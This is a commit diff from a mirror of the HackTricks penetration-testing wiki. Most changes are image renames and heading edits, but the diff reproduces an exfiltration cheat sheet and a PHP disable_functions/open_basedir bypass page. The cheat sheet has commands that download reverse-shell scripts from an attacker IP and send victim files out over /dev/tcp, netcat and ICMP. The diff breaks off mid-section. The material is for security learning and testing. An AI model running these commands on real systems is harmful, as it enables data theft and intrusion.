mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
GitBook: [#3330] No subject
This commit is contained in:
parent
25207a20d2
commit
341a55ff9d
28 changed files with 104 additions and 108 deletions
BIN
.gitbook/assets/image (307) (5) (1).png
Normal file
BIN
.gitbook/assets/image (307) (5) (1).png
Normal file
Binary file not shown.
After Width: | Height: | Size: 509 KiB |
Binary file not shown.
Before Width: | Height: | Size: 509 KiB After Width: | Height: | Size: 96 KiB |
Binary file not shown.
Before Width: | Height: | Size: 96 KiB After Width: | Height: | Size: 14 KiB |
|
@ -26,7 +26,7 @@ dht udp "DHT Nodes"
|
|||
|
||||
![](<.gitbook/assets/image (273).png>)
|
||||
|
||||
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
|
||||
![](<.gitbook/assets/image (345) (2) (2) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
|
||||
|
||||
InfluxDB
|
||||
|
||||
|
|
|
@ -58,7 +58,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
|
|||
|
||||
### [Security Hubs](https://securityhubs.io/)
|
||||
|
||||
![](<.gitbook/assets/security-hubs-logo\_v1.2 (1).png>)
|
||||
![](<.gitbook/assets/image (307).png>)
|
||||
|
||||
Through Security Skills as a Service, we help organizations to **defend against the Dark Hacking Arts**. Security Skills as a Service is an offensive cybersecurity consultancy model that combines an Intelligent Platform with the top-class, globally distributed, offensive security engineers, delivering **high-quality penetration testing results.** [**Security Hubs**](https://securityhubs.io/) **** bring together offensive penetration testing tactics with human behavioral science, providing real-time insights into threat actors' tradecraft and a **complete assessment of any risks**.
|
||||
|
||||
|
@ -75,7 +75,7 @@ Through Security Skills as a Service, we help organizations to **defend against
|
|||
|
||||
### [Intigriti](https://www.intigriti.com)
|
||||
|
||||
![](<.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
|
||||
![](<.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (14).png>)
|
||||
|
||||
**Intigriti** is the **Europe's #1** ethical hacking and **bug bounty platform.**
|
||||
|
||||
|
|
|
@ -405,7 +405,7 @@ Get the address to this table with: **`objdump -s -j .got ./exec`**
|
|||
|
||||
Observe how after **loading** the **executable** in GEF you can **see** the **functions** that are in the **GOT**: `gef➤ x/20x 0xDIR_GOT`
|
||||
|
||||
![](<../../.gitbook/assets/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1).png>)
|
||||
![](<../../.gitbook/assets/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1).png>)
|
||||
|
||||
Using GEF you can **start** a **debugging** session and execute **`got`** to see the got table:
|
||||
|
||||
|
|
|
@ -65,7 +65,7 @@ From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Sig
|
|||
|
||||
In order to mount a MBR in Linux you first need to get the start offset (you can use `fdisk` and the the `p` command)
|
||||
|
||||
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (3).png>)
|
||||
![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (3).png>)
|
||||
|
||||
An then use the following code
|
||||
|
||||
|
|
|
@ -152,7 +152,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi
|
|||
|
||||
Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`).
|
||||
|
||||
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (4).png>)
|
||||
![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (4).png>)
|
||||
|
||||
### USB Detective
|
||||
|
||||
|
|
|
@ -1,5 +1,7 @@
|
|||
# Exfiltration
|
||||
|
||||
## Exfiltration
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -16,32 +18,30 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (16).png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
{% endhint %}
|
||||
|
||||
## Copy\&Paste Base64
|
||||
### Copy\&Paste Base64
|
||||
|
||||
#### Linux
|
||||
**Linux**
|
||||
|
||||
```bash
|
||||
base64 -w0 <file> #Encode file
|
||||
base64 -d file #Decode file
|
||||
```
|
||||
|
||||
#### Windows
|
||||
**Windows**
|
||||
|
||||
```
|
||||
certutil -encode payload.dll payload.b64
|
||||
certutil -decode payload.b64 payload.dll
|
||||
```
|
||||
|
||||
## HTTP
|
||||
### HTTP
|
||||
|
||||
#### Linux
|
||||
**Linux**
|
||||
|
||||
```bash
|
||||
wget 10.10.14.14:8000/tcp_pty_backconnect.py -O /dev/shm/.rev.py
|
||||
|
@ -50,7 +50,7 @@ curl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py
|
|||
fetch 10.10.14.14:8000/shell.py #FreeBSD
|
||||
```
|
||||
|
||||
#### Windows
|
||||
**Windows**
|
||||
|
||||
```bash
|
||||
certutil -urlcache -split -f http://webserver/payload.b64 payload.b64
|
||||
|
@ -67,11 +67,11 @@ Start-BitsTransfer -Source $url -Destination $output
|
|||
Start-BitsTransfer -Source $url -Destination $output -Asynchronous
|
||||
```
|
||||
|
||||
### Upload files
|
||||
#### Upload files
|
||||
|
||||
[**SimpleHttpServerWithFileUploads**](https://gist.github.com/UniIsland/3346170)
|
||||
|
||||
### **HTTPS Server**
|
||||
#### **HTTPS Server**
|
||||
|
||||
```python
|
||||
# from https://gist.github.com/dergachev/7028596
|
||||
|
@ -114,23 +114,23 @@ if __name__ == "__main__":
|
|||
###
|
||||
```
|
||||
|
||||
## FTP
|
||||
### FTP
|
||||
|
||||
### FTP server (python)
|
||||
#### FTP server (python)
|
||||
|
||||
```bash
|
||||
pip3 install pyftpdlib
|
||||
python3 -m pyftpdlib -p 21
|
||||
```
|
||||
|
||||
### FTP server (NodeJS)
|
||||
#### FTP server (NodeJS)
|
||||
|
||||
```
|
||||
sudo npm install -g ftp-srv --save
|
||||
ftp-srv ftp://0.0.0.0:9876 --root /tmp
|
||||
```
|
||||
|
||||
### FTP server (pure-ftp)
|
||||
#### FTP server (pure-ftp)
|
||||
|
||||
```bash
|
||||
apt-get update && apt-get install pure-ftp
|
||||
|
@ -150,7 +150,7 @@ chown -R ftpuser:ftpgroup /ftphome/
|
|||
/etc/init.d/pure-ftpd restart
|
||||
```
|
||||
|
||||
### **Windows** client
|
||||
#### **Windows** client
|
||||
|
||||
```bash
|
||||
#Work well with python. With pure-ftp use fusr:ftp
|
||||
|
@ -163,14 +163,12 @@ echo bye >> ftp.txt
|
|||
ftp -n -v -s:ftp.txt
|
||||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (16).png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
{% endhint %}
|
||||
|
||||
## SMB
|
||||
### SMB
|
||||
|
||||
Kali as server
|
||||
|
||||
|
@ -208,7 +206,7 @@ WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.1
|
|||
WindPS-2> cd new_disk:
|
||||
```
|
||||
|
||||
## SCP
|
||||
### SCP
|
||||
|
||||
The attacker has to have SSHd running.
|
||||
|
||||
|
@ -216,7 +214,7 @@ The attacker has to have SSHd running.
|
|||
scp <username>@<Attacker_IP>:<directory>/<filename>
|
||||
```
|
||||
|
||||
# SSHFS
|
||||
## SSHFS
|
||||
|
||||
If the victim has SSH, the attacker can mount a directory from the victim to the attacker.
|
||||
|
||||
|
@ -226,23 +224,23 @@ sudo mkdir /mnt/sshfs
|
|||
sudo sshfs -o allow_other,default_permissions <Target username>@<Target IP address>:<Full path to folder>/ /mnt/sshfs/
|
||||
```
|
||||
|
||||
## NC
|
||||
### NC
|
||||
|
||||
```bash
|
||||
nc -lvnp 4444 > new_file
|
||||
nc -vn <IP> 4444 < exfil_file
|
||||
```
|
||||
|
||||
## /dev/tcp
|
||||
### /dev/tcp
|
||||
|
||||
### Download file from victim
|
||||
#### Download file from victim
|
||||
|
||||
```bash
|
||||
nc -lvnp 80 > file #Inside attacker
|
||||
cat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim
|
||||
```
|
||||
|
||||
### Upload file to victim
|
||||
#### Upload file to victim
|
||||
|
||||
```bash
|
||||
nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker
|
||||
|
@ -253,7 +251,7 @@ cat <&6 > file.txt
|
|||
|
||||
thanks to **@BinaryShadow\_**
|
||||
|
||||
## **ICMP**
|
||||
### **ICMP**
|
||||
|
||||
```bash
|
||||
#In order to exfiltrate the content of a file via pings you can do:
|
||||
|
@ -273,7 +271,7 @@ def process_packet(pkt):
|
|||
sniff(iface="tun0", prn=process_packet)
|
||||
```
|
||||
|
||||
## **SMTP**
|
||||
### **SMTP**
|
||||
|
||||
If you can send data to an SMTP server, you can create a SMTP to receive the data with python:
|
||||
|
||||
|
@ -281,7 +279,7 @@ If you can send data to an SMTP server, you can create a SMTP to receive the dat
|
|||
sudo python -m smtpd -n -c DebuggingServer :25
|
||||
```
|
||||
|
||||
## TFTP
|
||||
### TFTP
|
||||
|
||||
By default in XP and 2003 (in others it need to be explicitly added during installation)
|
||||
|
||||
|
@ -307,7 +305,7 @@ In **victim**, connect to the Kali server:
|
|||
tftp -i <KALI-IP> get nc.exe
|
||||
```
|
||||
|
||||
## PHP
|
||||
### PHP
|
||||
|
||||
Download a file with a PHP oneliner:
|
||||
|
||||
|
@ -315,13 +313,13 @@ Download a file with a PHP oneliner:
|
|||
echo "<?php file_put_contents('nameOfFile', fopen('http://192.168.1.102/file', 'r')); ?>" > down2.php
|
||||
```
|
||||
|
||||
## VBScript
|
||||
### VBScript
|
||||
|
||||
```bash
|
||||
Attacker> python -m SimpleHTTPServer 80
|
||||
```
|
||||
|
||||
#### Victim
|
||||
**Victim**
|
||||
|
||||
```bash
|
||||
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
|
||||
|
@ -355,7 +353,7 @@ echo ts.Close >> wget.vbs
|
|||
cscript wget.vbs http://10.11.0.5/evil.exe evil.exe
|
||||
```
|
||||
|
||||
## Debug.exe
|
||||
### Debug.exe
|
||||
|
||||
This is a crazy technique that works on Windows 32 bit machines. Basically the idea is to use the `debug.exe` program. It is used to inspect binaries, like a debugger. But it can also rebuild them from hex. So the idea is that we take a binaries, like `netcat`. And then disassemble it into hex, paste it into a file on the compromised machine, and then assemble it with `debug.exe`.
|
||||
|
||||
|
@ -373,16 +371,14 @@ wine exe2bat.exe nc.exe nc.txt
|
|||
|
||||
Now we just copy-paste the text into our windows-shell. And it will automatically create a file called nc.exe
|
||||
|
||||
## DNS
|
||||
### DNS
|
||||
|
||||
* [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil)
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">\
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (16).png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
|
|
|
@ -23,7 +23,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!\\
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
@ -78,7 +78,7 @@ There are also several tools that can perform **automatic vulnerabilities assess
|
|||
In some scenarios a **Brute-Force** could be useful to **compromise** a **service**. [**Find here a CheatSheet of different services brute forcing**](brute-force.md)**.**
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!\\
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
@ -165,7 +165,7 @@ Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be ve
|
|||
* [**Padding Oracle**](../cryptography/padding-oracle-priv.md)
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
|
||||
<img src="../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
|
|
@ -17,7 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">****\
|
||||
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">****\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
@ -792,7 +792,7 @@ Bettercap broadcast SSDP packets searching for all kind of services (UDP Port 19
|
|||
Bettercap broadcast WSD packets searching for services (UDP Port 3702).
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
|
||||
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
|
|
@ -343,7 +343,7 @@ The page www.mail-tester.com can indicate you if you your domain is being blocke
|
|||
* Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._
|
||||
* You can leave blank the username and password, but make sure to check the Ignore Certificate Errors
|
||||
|
||||
![](<../../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (6).png>)
|
||||
![](<../../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (6).png>)
|
||||
|
||||
{% hint style="info" %}
|
||||
It's recommended to use the "**Send Test Email**" functionality to test that everything is working.\
|
||||
|
|
|
@ -146,7 +146,7 @@ The response is a JSON dictionary with some important data like:
|
|||
* Signed using the **device identity certificate (from APNS)**
|
||||
* **Certificate chain** includes expired **Apple iPhone Device CA**
|
||||
|
||||
![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
|
||||
![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>)
|
||||
|
||||
### Step 6: Profile Installation
|
||||
|
||||
|
|
|
@ -241,7 +241,7 @@ In this case you could try to abuse the functionality creating a web with the fo
|
|||
|
||||
In order to find the **code that will be executed in the App**, go to the activity called by the deeplink and search the function **`onNewIntent`**.
|
||||
|
||||
![](<../../.gitbook/assets/image (436) (1) (1) (1).png>)
|
||||
![](<../../.gitbook/assets/image (436) (1) (1).png>)
|
||||
|
||||
Learn how to [call deep links without using HTML pages](./#exploiting-schemes-deep-links).
|
||||
|
||||
|
|
|
@ -731,7 +731,7 @@ You can collect console logs through the Xcode **Devices** window as follows:
|
|||
5. Reproduce the problem.
|
||||
6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window.
|
||||
|
||||
![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>)
|
||||
![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (14).png>)
|
||||
|
||||
You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command:
|
||||
|
||||
|
|
|
@ -19,7 +19,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
|
||||
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
@ -249,7 +249,7 @@ Entry_5:
|
|||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (13).png" alt="" data-size="original">\
|
||||
<img src="../../.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (13).png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
|
|
@ -90,11 +90,11 @@ Now that we know which kind of information is saved inside the database, let's t
|
|||
|
||||
In the introspection you can find **which object you can directly query for** (because you cannot query an object just because it exists). In the following image you can see that the "_queryType_" is called "_Query_" and that one of the fields of the "_Query_" object is "_flags_", which is also a type of object. Therefore you can query the flag object.
|
||||
|
||||
![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-17-48.png>)
|
||||
![](../../.gitbook/assets/screenshot-from-2021-03-13-18-17-48.png)
|
||||
|
||||
Note that the type of the query "_flags_" is "_Flags_", and this object is defined as below:
|
||||
|
||||
![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-22-57.png>)
|
||||
![](../../.gitbook/assets/screenshot-from-2021-03-13-18-22-57.png)
|
||||
|
||||
You can see that the "_Flags_" objects are composed by **name** and .**value** Then you can get all the names and values of the flags with the query:
|
||||
|
||||
|
@ -217,7 +217,7 @@ Or even **relations of several different objects using aliases**:
|
|||
|
||||
In the **introspection** you can find the **declared** **mutations**. In the following image the "_MutationType_" is called "_Mutation_" and the "_Mutation_" object contains the names of the mutations (like "_addPerson_" in this case):
|
||||
|
||||
![](<../../.gitbook/assets/Screenshot from 2021-03-13 18-26-27.png>)
|
||||
![](../../.gitbook/assets/screenshot-from-2021-03-13-18-26-27.png)
|
||||
|
||||
For this example imagine a data base with **persons** identified by the email and the name and **movies** identified by the name and rating. A **person** can be **friend** with other **persons** and a person can **have movies**.
|
||||
|
||||
|
@ -277,7 +277,7 @@ Below you can find the simplest demonstration of an application authentication r
|
|||
|
||||
As we can see from the response screenshot, the first and the third requests returned _null_ and reflected the corresponding information in the _error_ section. The **second mutation had the correct authentication** data and the response has the correct authentication session token.
|
||||
|
||||
![](<../../.gitbook/assets/image (119) (2).png>)
|
||||
![](<../../.gitbook/assets/image (119) (1).png>)
|
||||
|
||||
## CSRF in GraphQL
|
||||
|
||||
|
@ -312,6 +312,7 @@ Also, abusing a [**XS-Search**](../../pentesting-web/xs-search.md) **attack** mi
|
|||
For more information **check the** [**original post here**](https://blog.doyensec.com/2021/05/20/graphql-csrf.html).
|
||||
|
||||
## Authorization in GraphQL
|
||||
|
||||
Many GraphQL functions defined on the endpoint might only check the authentication of the requester but not authorization.
|
||||
|
||||
Modifying query input variables could lead to sensitive account details [leaked](https://hackerone.com/reports/792927).
|
||||
|
@ -327,6 +328,7 @@ Mutation could even lead to account take over trying to modify other account dat
|
|||
```
|
||||
|
||||
## Leaked GraphQL Structures
|
||||
|
||||
If introspection is disabled, try looking at the website source code. The queries are often pre loaded into browser as javascript libraries. These prewritten queries can reveal powerful information about the schema and use of each object and function. The `Sources` tab of the developer tools can search all files to enumerate where the queries are saved. Sometimes even the administrator protected queries are already exposed.
|
||||
|
||||
```javascript
|
||||
|
|
|
@ -338,7 +338,7 @@ C:\xampp\tomcat\conf\server.xml
|
|||
|
||||
If you see an error like the following one:
|
||||
|
||||
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10).png>)
|
||||
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (10).png>)
|
||||
|
||||
It means that the server **didn't receive the correct domain name** inside the Host header.\
|
||||
In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one.
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# PHP - Useful Functions & disable\_functions/open\_basedir bypass
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,10 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
## PHP Command & Code Execution
|
||||
|
||||
# PHP Command & Code Execution
|
||||
|
||||
## PHP Command Execution
|
||||
### PHP Command Execution
|
||||
|
||||
**exec** - Returns last line of commands output
|
||||
|
||||
|
@ -83,7 +82,7 @@ file_put_contents('/www/readflag.sh', base64_decode('IyEvYmluL3NoCi9yZWFkZmxhZyA
|
|||
|
||||
**dl** - This function can be used to dynamically load a PHP extension. This function won't be present always, so you should check if it's available before trying to exploit it. Read[ this page to learn how to exploit this function](disable\_functions-bypass-dl-function.md).
|
||||
|
||||
## PHP Code Execution
|
||||
### PHP Code Execution
|
||||
|
||||
Apart from eval there are other ways to execute PHP code: include/require can be used for remote code execution in the form of Local File Include and Remote File Include vulnerabilities.\
|
||||
**${\<php code>}** - If your input gets reflected in any PHP string, it will be executed.\
|
||||
|
@ -101,7 +100,7 @@ Apart from eval there are other ways to execute PHP code: include/require can be
|
|||
**$func->invokeArgs(array());**\
|
||||
**serialize/unserialize**
|
||||
|
||||
# disable\_functions & open\_basedir
|
||||
## disable\_functions & open\_basedir
|
||||
|
||||
**Disabled functions** is the setting that can be configured in `.ini` files in PHP that will **forbid** the use of the indicated **functions**. **Open basedir** is the setting that indicates to PHP the folder that it can access.\
|
||||
The PHP setting sue to be configured in the path _/etc/php7/conf.d_ or similar.
|
||||
|
@ -112,12 +111,12 @@ Both configuration can be seen in the output of **`phpinfo()`**:
|
|||
|
||||
![](<../../../../.gitbook/assets/image (347).png>)
|
||||
|
||||
# open\_basedir Bypass
|
||||
## open\_basedir Bypass
|
||||
|
||||
`open_basedir` will configure the folders that PHP can access, you **won't be able to to write/read/execute any file outside** those folders, but also you **won't even be able to list** other directories.\
|
||||
However, if somehow you are able to execute arbitrary PHP code you can **try** the following chunk of **codes** to try to **bypass** the restriction.
|
||||
|
||||
## Listing dirs with glob:// bypass
|
||||
### Listing dirs with glob:// bypass
|
||||
|
||||
In this first example the `glob://` protocol with some path bypass is used:
|
||||
|
||||
|
@ -142,7 +141,7 @@ foreach($file_list as $f){
|
|||
**Note2**: It looks like part of the code is duplicated, but that's actually necessary!\
|
||||
**Note3**: This example is only useful to list folders not to read files
|
||||
|
||||
## Full open\_basedir bypass abusing FastCGI
|
||||
### Full open\_basedir bypass abusing FastCGI
|
||||
|
||||
If you want to **learn more about PHP-FPM and FastCGI** you can read the [first section of this page](disable\_functions-bypass-php-fpm-fastcgi.md).\
|
||||
If **`php-fpm`** is configured you can abuse it to completely bypass **open\_basedir**:
|
||||
|
@ -514,24 +513,24 @@ Just access `http://vulnerable.com:1337/l.php?cmd=echo file_get_contents('/etc/p
|
|||
You may be thinking that just in the same way we have overwritten `open_basedir` configuration we can **overwrite `disable_functions`**. Well, try it, but it won't work, apparently **`disable_functions` can only be configured in a `.ini` php** configuration file and the changes you perform using PHP\_VALUE won't be effective on this specific setting.
|
||||
{% endhint %}
|
||||
|
||||
# disable\_functions Bypass
|
||||
## disable\_functions Bypass
|
||||
|
||||
If you manage have PHP code executing inside a machine you probably want to go to the next level and **execute arbitrary system commands**. In this situation is usual to discover that most or all the PHP **functions** that allow to **execute system commands have been disabled** in **`disable_functions`.**\
|
||||
So, lets see how you can bypass this restriction (if you can)
|
||||
|
||||
## Automatic bypass discovery
|
||||
### Automatic bypass discovery
|
||||
|
||||
You can use the tool [https://github.com/teambi0s/dfunc-bypasser](https://github.com/teambi0s/dfunc-bypasser) and it will indicate you which technique you can use to bypass `disable_functions`.
|
||||
|
||||
## Bypassing using other system functions
|
||||
### Bypassing using other system functions
|
||||
|
||||
Just return to the begging of this page and **check if any of the command executing functions isn't disabled and available in the environment**. If you find just 1 of them, you will be able to use it to execute arbitrary system commands.
|
||||
|
||||
## LD\_PRELOAD bypass
|
||||
### LD\_PRELOAD bypass
|
||||
|
||||
It's well known that some functions in PHP like `mail()`are going to **execute binaries inside the system**. Therefore, you can abuse them using the environment variable `LD_PRELOAD` to make them load an arbitrary library that can execute anything.
|
||||
|
||||
### Functions that can be used to bypass disable\_functions with LD\_PRELOAD
|
||||
#### Functions that can be used to bypass disable\_functions with LD\_PRELOAD
|
||||
|
||||
1. `mail`
|
||||
2. `mb_send_mail` : If your system has `php-mbstring` module installed then this function can be used to bypass php disable\_functions.
|
||||
|
@ -557,10 +556,10 @@ uid_t getuid(void){
|
|||
}
|
||||
```
|
||||
|
||||
### Bypass using Chankro
|
||||
